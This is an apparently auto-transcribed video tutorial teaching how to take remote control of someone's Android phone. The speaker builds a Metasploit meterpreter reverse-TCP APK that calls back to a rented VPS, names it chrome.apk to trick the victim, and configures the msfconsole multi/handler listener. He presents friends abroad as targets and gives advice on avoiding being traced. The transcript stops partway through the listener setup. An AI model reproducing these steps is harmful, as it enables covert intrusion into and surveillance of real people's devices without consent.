Okay guys, how are you all? Let me teach you how you guys can hack the what Android device. Okay, let me take my victim device, okay, which is my Android Studio emulator. Okay, right. Let me click on the AVD manager. Let me run this. Okay, no. Okay, click here. Let me close this. Started. Let me close this. Okay, started. Okay, this is a Android device. Assume that this is a victim. Okay, where the hell it is? Menu. Okay, here is a menu, and let me show you the version of this Android device. I think 11. Okay, yes. The hell, why it's not? Okay, let me wait. Okay, go up, go on the settings. You guys can see. Let me go down. Here you guys can see about the hell. Okay, about emulated device. Click here. Let me show you. Okay, it's a 11. Okay, Android version 11. Okay, let me go in home. Okay, like this. Okay, assume that this is your victim. Okay, right, let me hack this. Okay, how to hack? Okay, simple, go to the RDP. Last class is what we did, we just install the what metasploit in our VPS. Okay, RDP or VPS or same. Okay, but this is a okay, just leave it. Okay, see, just go in the local and you guys can see a metasploit framework is there. Okay, just click here. This is not like this. Okay, this is not like this, like we didn't install in CMD. Here is a CMD, we just type the bash.exe, then we get a Linux environment there. Okay, this is a different, completely this is a different. You guys will understand why I install this. Okay, just leave it. Okay, just leave this and just focus here in the VPS section. Okay, just click on the bin in metasploit. You should let me go back. Okay, see in let me again go back. You guys see here there is a metasploit. Click on the metasploit and click on the bin. Okay, you guys can see here there is a files. Okay, let me hack the Android device right now. Okay, just click here. Okay, just click here, just type here CMD. Okay, let me take the full screen. You guys are hope you guys seeing this. Okay, let me type the full screen. Just see this command. Okay, see, again I am saying you need to go in the metasploit folder in bin section. Okay, you just need to type here CMD. Okay, you need to open CMD from this folder. Okay, see, here is a bin. You guys can see here is a bin and here is a bin. Okay, just again I am saying please open from here. Okay, just what I did here. Okay, just type msf venom. Okay, -p android. Okay, / meter preter / reverse underscore. Okay, TCP. Okay, just type lhost. Okay, is equal. Okay, just type your IP address of your RDP. Okay, here I got it 80.85.158. okay, 80.85.153 158.235. okay, just 158.235, I think so. Yes, see, don't type any mistake here. If you type, you just need to see this. Okay, you just need to type in the lhost is equal, you need to type this IP address. Okay, to attack local out of network. Okay, like let me tell you what is a local attack, what is out of network attack. Okay, assume that you are hacking your friend, okay, who is living in the USA. Okay, and you are in you are in Nigeria, okay, you are living in the Nigeria, and your friend is living in the USA, and you need to hack him. How can you hack? You just need to buy the VPS for that, okay. Yes, many you guys know, I know many of you guys know about the port forwarding or something. It is very, don't use that port forwarding, okay, because it can trace you back, okay. Yes, you can decompile this application and you can see the IP, you can hide it, okay, but please, for beginners I am recommending this to you. Don't use the port forwarding and this types of, okay. Just use the VPS, you can use the AWS, you can use the a lot Russian servers are there, you can use them. They will provide very good, okay, VPS. You can buy it, okay. Just go and the Google and search it, okay. Just type your IP of your RDP and then just type lport, PORT, okay, right. Port is equal, just type here something like let me type 5566. You can type any 4-digit number, okay, anything. Don't type 1000, okay. Just type 1111 or something like that. 777, sorry, I think there is a ports. Let me show you. Let me go TCP ports in PC. Okay, oh sorry, the amount of, sorry, I don't want the TCP and UDP. Okay, there is a 65,535 ports are there. You can choose anything. So let me tell you, the hell, just leave it there, okay. You can choose under this, okay. Just type like 44445555 or something like that, okay. You can choose anything, it's totally depend upon you, okay. Just don't choose ports under 1000, okay, because it's working on other services, okay. Again I am saying, don't choose under 1000. You can choose like 11,000 from 11,000, okay. Right, just type here -o, and what you giving the name of your what your payload. I am a white sec. If you are hacking to your friend, then just type android security or something, okay. You can give your name as well, but don't give your name, just give it as a chrome.apk. just enter. It will create one APK for you, which is a malicious. If the victim installed it, it can completely is under your control, okay. Yes, just wait. Okay, you guys can see here, you will get the payload, okay, in this folder, bin folder. Okay, let me wait it. Should I pause the video? Okay, no problem. See guys, you can see here is a chrome.apk, which is 10. Okay, let me do one thing. Let me copy this and let me paste in my host here. Okay, wait, it's okay, here it is, chrome.apk. Let me show you one thing. Now you guys need to do one thing, okay. Sorry for I just entered in the wrong, okay. Let me go in here, okay. Just you need to type, we just created the APK, right? Malicious APK we created, okay. We need to do one thing right now, okay. Just close this. Just you guys can see here is MSF console is there, okay. MSF console.bat. just double click it, it will load, okay. It will take like 3 minutes, okay. Should I pause the video? Okay, let me pause it. Okay, if you are seeing this type of something warning or something, don't be panic, okay. It's nothing, just leave it, okay. It's loaded like in one minute, I think so, okay. All right, okay, just type here use space exploit. Just remove this / multi /handler. Okay, just see this. Okay, let me make a full screen. Okay, just enter. Okay, now just you need to type here, just see carefully, set. Okay, set payload. What is the payload? I just forget. Okay, set payload Android. In command we type it, right? Okay, set Android, set payload Android / meter treater / what is it then? Okay, yes, reverse underscore. Okay, TCP. Okay, just enter it. Okay, now set L host. Okay, don't give is equal right now. Okay, just type lhost, just type your RDP IP there. 80.85. See this one. Okay, 80.85.158. Same. Yes, just enter. Just type here set L port. I just type 5566 something, right? Okay, I just forget it, man. Okay, first thing is don't forget your port. Okay, if you are forget your port, then you can't able to you need to create again your payload. Okay, so I think I just pasted 5566 or some 5544 is okay. Let me pause the video, let me stop the video, then let me see the port which I given there. Okay.